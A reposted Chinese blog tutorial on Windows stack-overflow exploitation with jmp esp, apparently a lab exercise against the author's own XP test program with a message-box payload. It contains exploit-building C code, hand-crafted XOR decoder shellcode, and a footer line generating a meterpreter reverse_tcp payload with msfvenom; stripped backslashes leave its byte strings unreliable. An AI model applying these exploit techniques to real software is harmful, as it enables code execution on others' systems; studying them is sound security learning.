Windows Shellcode学习笔记——栈溢出中对jmp esp的利用与优化

最新推荐文章于 2023-05-25 11:54:52 发布
最新推荐文章于 2023-05-25 11:54:52 发布
阅读量506 收藏 4
点赞数
原文链接:https://yq.aliyun.com/articles/220300
版权
本文讲的是 Windows Shellcode学习笔记——栈溢出中对jmp esp的利用与优化
0x00 前言

在《Windows Shellcode学习笔记——shellcode在栈溢出中的利用与优化》中对栈溢出的利用做了介绍。通过将返回地址覆盖为shellcode在内存中的起始地址,实现对栈溢出的利用

但是shellcode在内存中的起始地址往往不固定,导致漏洞利用不一定成功,本文将通过jmp esp的方式来解决这个问题

0x01 简介

函数代码在栈中保存顺序(直观理解,已省略其他细节):

buffer
前栈帧EBP
返回地址
ESP

ESP寄存器总是指向返回地址的下一地址

如果用jmp esp覆盖返回地址,那么在函数返回后会执行jmp esp,跳到esp,也就是返回地址的下一地址开始执行

因此,将shellcode放于返回地址之后,并将返回地址覆盖为jmp esp,就可以避免shellcode在内存中产生的移位问题

本文将要介绍使用jmp esp的具体细节,并分享如何优化我们自己生成的弹框实例shellcode,实现jmp esp利用,编写程序自动实现,解决shellcode在内存中的起始地址不固定的问题。

弹框实例shellcode下载地址:

https://github.com/3gstudent/Shellcode-Generater/blob/master/shellcode.bin

0x01 jmp esp

获得jmp esp的机器码:

可通过搜索各个进程空间来获取,具体原理可参考《0day安全:软件漏洞分析技术》3.2.2节

为便于理解和测试,直接引用《0day安全:软件漏洞分析技术》3.2.2节中的代码,代码如下:

#include <stdio.h>
#include <windows.h>
#define DLL_NAME "user32.dll"
int main()
{
    BYTE *ptr;
    int position,address;
    HINSTANCE handle;
    BOOL done_flag=FALSE;
    handle=LoadLibrary(DLL_NAME);
    if(!handle)
    {
        printf("load dll error");
        return 0;
    }
    ptr=(BYTE *)handle;
    for(position=0;!done_flag;position++)
    {
        try
        {
            if(ptr[position]==0xFF &&ptr[position+1]==0xE4)
            {
                int address=(int)ptr+position;
                printf("OPCODE found at 0x%xn",address);
            }
        }
        catch(...)
        {
        int address=(int)ptr+position;
        printf("END OF 0x%xn",address);
        done_flag=true;
        }
    }
    return 0;
}

如下图,获得机器码,挑选第一个地址0x77d29353,构建我们的shellcode

Windows Shellcode学习笔记栈溢出中对jmp esp的利用与优化

初步设想shellcode的结构为:

填充数据(长度44)+偏移长度+jmp esp的机器码+解码器+加密的弹框shellcode+结束字符

具体数据为:

"x34x33x32x31“*11+"x90x90x90x90x90x90x90x90"+"x53x93xD2x77"+"x83xC2x14x33xC9x8Ax1Cx0Ax80xF3x44x88x1Cx0Ax41x80xFBx91x75xF1"+加密的弹框shellcode+xD5

通过程序自动实现此过程,代码如下:

#include <windows.h>
size_t GetSize(char * szFilePath)
{
    size_t size;
    FILE* f = fopen(szFilePath, "rb");
    fseek(f, 0, SEEK_END);
    size = ftell(f);
    rewind(f);
    fclose(f);
    return size;
}
unsigned char* ReadBinaryFile(char *szFilePath, size_t *size)
{
    unsigned char *p = NULL;
    FILE* f = NULL;
    size_t res = 0;
    *size = GetSize(szFilePath);
    if (*size == 0) return NULL;        
    f = fopen(szFilePath, "rb");
    if (f == NULL)
    {
        printf("Binary file does not exists!n");
        return 0;
    }
    p = new unsigned char[*size];
    rewind(f);
    res = fread(p, sizeof(unsigned char), *size, f);
    fclose(f);
    if (res == 0)
    {
        delete[] p;
        return NULL;
    }
    return p;
}
int main(int argc, char* argv[])
{
    char *szFilePath="c:testshellcode.bin";
    char *szFilePath2="c:testshellcode2.bin";
    unsigned char *BinData = NULL;
    size_t size = 0;    
    BinData = ReadBinaryFile(szFilePath, &size);
    for(int i=0;i<size;i++)
    {
        BinData[i]=BinData[i]^0x44;
    }
    FILE* f = NULL; 
    f = fopen(szFilePath2, "wb");
    if (f == NULL)
    {
        printf("Create errorn");
        return 0;
    }
    char filler[]="x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31";
    char nop[]="x90x90x90x90x90x90x90x90";
    char jmpesp[]="x53x93xD2x77";
    char decode[]="x83xC2x14x33xC9x8Ax1Cx0Ax80xF3x44x88x1Cx0Ax41x80xFBx91x75xF1";
    char end[]="xD5";
    fwrite(filler,sizeof(filler)-1,1,f);
    fwrite(nop,sizeof(nop)-1,1,f);
    fwrite(jmpesp,sizeof(jmpesp)-1,1,f);
    fwrite(decode,sizeof(decode)-1,1,f);
    fwrite(BinData,size,1,f);
    fwrite(end,1,1,f);
    fclose(f);
}

运行后生成shellcode2.bin

由于我们自己生成的这个shellcode长度较长,在测试时需要对原书中的栈溢出程序作修改,否则会报错,例如 

if(!(fp=fopen("password.txt","rw+")))

应修改为 

if(!(fp=fopen("password2.txt","rb")))

更多细节可参考完整代码,栈溢出测试程序的完整代码已上传至github,地址如下:

https://github.com/3gstudent/Shellcode-Generater/blob/master/stackoverflowExample(jmpesp).cpp

测试栈溢出测试程序

测试环境:

测试系统:Win XP
编译器:VC6.0
build版本: debug版本

测试栈溢出测试程序,发现报错

0x02 shellcode调试与优化

使用OllyDbg调试

关键位置按F2下断点,按F9执行到断点处

如下图,成功覆盖返回地址,数值为0x77d29353

Windows Shellcode学习笔记栈溢出中对jmp esp的利用与优化

按F8单步执行,跳到JMP ESP,如下图

Windows Shellcode学习笔记栈溢出中对jmp esp的利用与优化

接着F8单步执行,如下图,此时EDX寄存器不再保存shellcode起始地址,EDX值为0x0012FFE0,而理论上shellcode起始地址应为0x0012F77C

Windows Shellcode学习笔记栈溢出中对jmp esp的利用与优化

需要找到一个能保存shellcode起始地址的寄存器或者存在某种偏移关系的寄存器

通过进一步调试,发现整个过程EDI寄存器的值保持不变,为 0X0012F720,而且shellcode起始地址作了变化,不再是0x0012F77C

如下图,在CALL test2.004011A0下断点,shellcode起始地址由0x0012F77C变为0X0012F6F0

Windows Shellcode学习笔记栈溢出中对jmp esp的利用与优化

如下图,0x0012F77C已被覆盖,侧面证明shellcode起始地址发生变化

Windows Shellcode学习笔记栈溢出中对jmp esp的利用与优化

综上,可大胆推测实际shellcode起始地址=EDI-0X000008F0h

解码器实现思路如下:

通过EDI-0X000008F0h来获得shellcode起始地址,并且保存在寄存器EAX中

对应汇编代码如下:

void main()
{
    __asm
    {
        sub edi,0x8F0
        mov eax,edi
        add eax,0x28
        xor ecx,ecx
decode_loop:
        mov bl,[eax+ecx]
        xor bl,0x44
        mov [eax+ecx],bl
        inc ecx
        cmp bl,0x91
        jne decode_loop
    }
}

提取出机器码为 

"x81xEFxF0x08x00x00x8BxC7x83xC0x28x33xC9x8Ax1Cx08x80xF3x44x88x1Cx08x41x80xFBx91x75xF1"

如图

Windows Shellcode学习笔记栈溢出中对jmp esp的利用与优化

此时又出现x00字符,实际使用时会被提前截断,所以汇编代码需要作进一步优化:

通过先加后减两步操作,来避免shellcode出现0字符

注:

先减后加会造成越界

先加后减两步操作如下:

EDI-0X000008F0h=0X0012F720+0X11111111h-0X111119A1h

由于shellcode前面多了填充数据,所以解码器的偏移也要重新计算,偏移=填充数据长度+解码器长度=0x34+0x26=0x5A

对应完整汇编代码如下:

void main()
{
    __asm
    {
        add edi,0X11111111
        sub edi,0X111119A1
        mov eax,edi
        add eax,0x5A
        xor ecx,ecx
decode_loop:
        mov bl,[eax+ecx]
        xor bl,0x44
        mov [eax+ecx],bl
        inc ecx
        cmp bl,0x91
        jne decode_loop
    }
}

Windows Shellcode学习笔记栈溢出中对jmp esp的利用与优化

如上图,提取机器码为

"x81xC7x11x11x11x11x81xEFxA1x19x11x11x8BxC7x83xC0x5Ax33xC9x8Ax1Cx08x80xF3x44x88x1Cx08x41x80xFBx91x75xF1"

如下图,寻址正常,shellcode成功执行

Windows Shellcode学习笔记栈溢出中对jmp esp的利用与优化

0x03 程序自动实现

将以上代码同获得jmp esp机器码的代码融合,实现自动获取jmp esp的机器码并写入shellcode,完整代码已上传至github:

https://github.com/3gstudent/Shellcode-Generater/blob/master/jmpespshellcode.cpp

注:

通过子函数GetAddress()实现自动寻址,需要先从子函数GetAddress()返回int型数据,再在main函数中通过指针读取jmp esp的机器码

如果顺序颠倒,那么地址无法获取

错误的获取地址代码如下:

unsigned char *GetAddress()
{
    BYTE *ptr;
    int position,address;
    HINSTANCE handle;
    BOOL done_flag=FALSE;
    handle=LoadLibrary(DLL_NAME);
    if(!handle)
    {
        printf("load dll error");
        return 0;
    }
    ptr=(BYTE *)handle;
    for(position=0;!done_flag;position++)
    {
        try
        {
            if(ptr[position]==0xFF &&ptr[position+1]==0xE4)
            {
                int address=(int)ptr+position;
                unsigned char *Buff=(unsigned char *)&address;
                return Buff;                
            }           
        }
        catch(...)
        {
        int address=(int)ptr+position;
        printf("END OF 0x%xn",address);
        done_flag=true;
        }
    }
    return 0;
}
unsigned char *jmpesp=NULL;
jmpesp=GetAddress();

0x04 小结

本文介绍了栈溢出中使用jmp esp的利用方法,结合遇到的实际情况对我们自己生成的弹框实例shellcode作优化,选取固定寄存器地址,计算偏移,最终定位shellcode起始地址,完成利用。




原文发布时间为:2017年3月8日
本文作者:3gstudent
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
weixin_33787529
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JMPESP.rar_jmp_jmp esp_jmp9.02 crack_shellcode_sp3 jmp esp
09-24
获取jmp esp地址程序,shellcode编写需要用到
windows系统典型漏洞分析
qq_51581716的博客
06-04 1975
由于SHE结构存放在栈,因此攻击者可以利用栈溢出漏洞,设计特定的溢出数据,将SEH异常函数的入口地址覆盖为Shellcode的起始地址或可以跳转到Shellcode的跳转指令地址,从而导致程序发生异常时,Windows异常处理机制执行的不是预设的异常处理函数,而是Shellcode。在实际的漏洞利用,由于动态链接库的装入和卸载等原因,Windows进程的函数栈帧可能发生移位,即Shellcode在内存的地址是动态变化的,所以上述采用直接赋地址值的简单方式在以后的运行过程会出现跳转异常。
调用动态链接库接口函数报错“未经处理的异常: 0xC0000005”
Kelvin_Yan的专栏
03-08 1463
DLL调用的一种错误
利用JMP ESP植入SHELLCODE
weixin_44723038的博客
10-19 1104
当我们使用构造shellcode覆盖返回地址跳转到shellcode植入点的位置进行攻击时,常常很难找到该地址的具体位置,无法到达目标计算机上去调试,因此更常用的是利用JMP ESP指令来进行攻击。 代码: #include <stdio.h> #include <windows.h> #include <stdlib.h> #define PASSWORD ...
【0day shellcode编写艺术】—— jmp esp、动态获取api。后续:编码、压缩
desword-- 技术,杂文。
12-11 2736
此次主要徒手体会了一下编写shellcode 的不容易。当真不容易,看着作者的代码,都感觉自己无处可以下手了。 需要的底层原理知识也还挺多需要补充上去的。 打算后期再逐渐补充。目前阶段将jmp esp弄懂了。后面动态获取api在主机上出错了。问题和搜索jmp esp代码时候貌似一样,产生访问越权的问题。后期再继续决吧。 目前整理一下整个的思路。 1、shellcode、expoit的概念;
Windows内存漏洞——栈溢出漏洞及其利用分析
theglasssky的博客
05-25 585
windows系统内存漏洞关于栈溢出的部分
rust-windows-shellcode:RustWindows Shellcode开发
03-05
用Rust编写Windows Shellcode 项目概况 Windows shellcode项目位于shellcode/ ,它可以构建为仅包含.text节的PE文件,并且没有外部依赖项。 然后,我们可以转储.text节并进行一些修补以使其与位置无关。 这个想法...
overflow-vulnerability-exploit:此Shellcode旨在利用Windows上的溢出漏洞来执行远程代码
05-01
溢出漏洞利用Shellcode旨在利用Windows上的溢出漏洞来执行远程代码我的shellcode执行以下任务:1.使用进程环境块(PEB)查找kernel32.dll地址。 由于我们可以在fs:[0x30]处找到PEB地址,并且kernel32.dll始终是要...
go-shellcode:将Shellcode加载到新进程
02-06
使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444c:\windows\temp>sc.exe fce8820000006089e531c0648b...
shellcc:使用GCC构建优化Shellcode。 适合学习组装和与ABI一起玩
05-18
SHELLCC是用于使用GCC和其他二进制工具在C生成shellcode的构建环境。 它的目的是使汇编知识有限的人可以使用高级语言(尤其是C)编写高质量的Shellcode并带来代码可维护性。 一般来说,shellcode不需要复杂的逻辑...
软件安全实验——lab6(缓冲区溢出2:使用jmp esp或者call esp方法和修改函数指针)
Onlyone_1314的博客
07-30 936
目录标题Task 1第一步:打开内存地址随机化第二步:编译上面的程序为Set-UID程序,注意加上-fno-stack-protector进行编译第三步:bof的返回地址第四步:确定缓冲区的位置第五步:返回地址和缓冲区之间的距离Task 2第一步:打开内存地址随机化第二步:编译上面的程序为Set-UID程序,注意加上-fno-stack-protector进行编译第三步:strcpy函数的返回地址第四步:hmm函数的地址第五步:攻击 Task 1 下面的程序具有缓冲区溢出,利用jmp esp或者call e
栈溢出笔记1.3 准备Shellcode
hustd10的博客
04-09 3367
经过1.1和1.2节的讲述,我们已经知道了如何更改EIP的值。程序执行函数之后将跳转到我们设定的位置开始执行,因此,我们需要准备一个自己的程序,接手后面的工作。这是一个什么样的程序?是一个C语言编写的代码?是一个可直接调用的exe?肯定不是,因为EIP所指的地址保存的内容为指令的操作码,CPU读取该操作码执行相应的操作。所以我们要准备的程序也应该是一段“操作码”。继续写1.1的Hello Worl
栈溢出学习(二)之 jmp esp & return2libc
Pz_mstr's Blog
03-22 2878
前言 栈溢出学习(二),针对一个例子,进行各种栈溢出技术的练习。本文内容承接栈溢出学习(一) 本文属于新手实验难度,过程比较详细,适合新手学习 样例代码 本文使用的代码如下 #include <stdio.h> #include <stdlib.h> #include <string.h> /* * compiled with: * gcc -...
动手实验 CVE-2010-3333 Microsoft RTF栈溢出漏洞
abelxu
02-13 3554
手把手分析CVE-2010-3333 RTF栈溢出漏洞,同时分析了msf如何生成通用性的exp
缓冲区溢出漏洞攻击——Shellcode编写
热门推荐
pianogirl123的博客
12-19 1万+
一、实验内容利用一个程序漏洞,编写shellcode,达成效果:蹦出对话框,显示“You have been hacked!(by JWM)”二、实验原理因为输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符覆盖了返回地址。如果覆盖的返回地址是一个有效地址,而在该地址处又有有效的指令,那么系统就会毫不犹豫地跳到该地址处去执行指令。本次实验用到了跳板(jmp esp)由于操作系统每次
缓冲区溢出(栈溢出)实验 之 JMP ESP
大头的博客
07-27 9443
3、缓冲区溢出之JMP ESP 本文属于原创,如有错误请指正。其引用他人的部分已经标出,如涉及版权问题请联系本人 这里不得不讲一讲JMP ESP的原理了,在实验之前我一直没看懂他是如何试下跳转ESP之后回到栈区执行我们的shellcode的。在实验你仔细观看会发现随着函数栈的销毁ESP是在变化的,JMP ESP正式利用这种变化,将我们精心准备的shellcode执行。   JMP ES...
栈溢出 利用jmp esp绕过栈帧移位
Misaka10046的博客
09-16 533
实验代码 #include<stdio.h> #include<windows.h> #define PASSWORD "1234567" int verify_password(char *password) { int authenticated; char buffer[44]; authenticated = strcmp(password,PASSWORD); strcpy(buffer,password);//overflowed return authenti
缓冲区溢出学习笔记
fisher_jiang的专栏
06-15 1788
一:缓冲区溢出是指当计算机程序向缓冲区内填充的数据位数超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上,我们使用精心设计的shellcode来覆盖合法的数据,从何使我们的shellcode得到执行。缓冲区溢出堆栈原理图:二:需要决的几个小问题:2.1缓冲区溢出后,用“jmp esp“指令地址覆盖原来的函数返回地址,执行jmp esp后,ip指针便指向缓冲区我们的shellco
关于 [栈溢出jmp esp执行shellcode] 原理分析
weixin_34050519的博客
11-03 198
原文地址:https://blog.csdn.net/lixiangminghate/article/details/53333710 正常情况下,函数栈分布图如下: 即,返回地址被改为一段缓存区的地址。当函数执行结束,从栈取返回地址准备执行时,取到的是shellcode的地址,最终跳进shellcode执行。这段shellcode的地址一般被硬编码为某个地址,这个地址可以存在于程序空间...
linux 64位 栈溢出
最新发布
08-19
在Linux 64位系统栈溢出是一种常见的安全漏洞。栈溢出是指当程序写入超过栈分配的缓冲区的数据时,会覆盖到栈上的其他数据,从而导致程序的异常行为。这个漏洞可以被恶意攻击者利用,执行任意的代码或者获取敏感数据。 在64位系统栈溢出的原理和32位系统类似,但是由于64位系统的栈和寄存器的大小不同,所以在实际操作上会有所不同。一种常见的攻击方法是通过溢出覆盖返回地址,将程序的控制流引导到恶意代码执行的地址上。为了实现栈溢出攻击,攻击者需要了目标程序的内存布局和对应的函数调用机制。 引用提到了关于Linux下64位缓冲区溢出的文章,对于想深入了64位系统下的栈溢出攻击的人来说,这篇文章可能是一个很好的参考。引用提供了一个关于shellcode的示例,可以用来在64位系统执行系统命令。而引用则指出本文的目的是让读者学习64位缓冲区溢出的基础知识。 总的来说,在Linux 64位系统栈溢出是一种常见的安全漏洞,攻击者可以通过溢出覆盖返回地址来执行恶意代码。为了进行栈溢出攻击,攻击者需要了目标程序的内存布局和函数调用机制。可以参考引用的文章来深入了64位系统下的栈溢出攻击的细节。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [linux64 溢出,64位Linux下的栈溢出](https://blog.csdn.net/weixin_36383252/article/details/116872723)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [linux栈溢出](https://blog.csdn.net/qq_45323960/article/details/122766130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值